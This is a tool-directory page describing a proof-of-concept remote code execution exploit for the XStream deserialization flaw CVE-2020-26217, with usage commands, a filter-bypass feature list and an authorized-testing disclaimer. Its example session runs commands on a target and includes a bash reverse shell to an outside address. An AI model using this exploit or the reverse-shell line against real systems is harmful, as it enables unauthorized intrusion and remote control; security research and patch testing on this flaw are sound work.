Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStream反序列化的poc | Kitploit
Tools/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream反序列化的poc

View Repository
29 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-26217 XStream RCE Exploit

XStream Remote Code Execution Vulnerability Exploit Tool.

Vulnerability Description

CVE-2020-26217 is a deserialization vulnerability in the XStream library that allows an attacker to trigger remote code execution by crafting malicious XML data.

Affected versions: XStream <= 1.4.13

Usage

root@kitploit:~
go run poc.go <target URL>

Example

root@kitploit:~
# Run the tool
go run poc.go http://target.com:8080/?data

# After entering interactive mode, input commands
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Features

  • Interactive command execution
  • Automatic URL parameter name parsing
  • Base64 encoding to bypass special character filtering
  • Supports HTTPS (skip certificate verification)

Compilation

root@kitploit:~
go build -o poc poc.go

Disclaimer

This tool is intended for security research and authorized testing only. Do not use it for illegal purposes. Users assume all related legal responsibilities.

Download Tool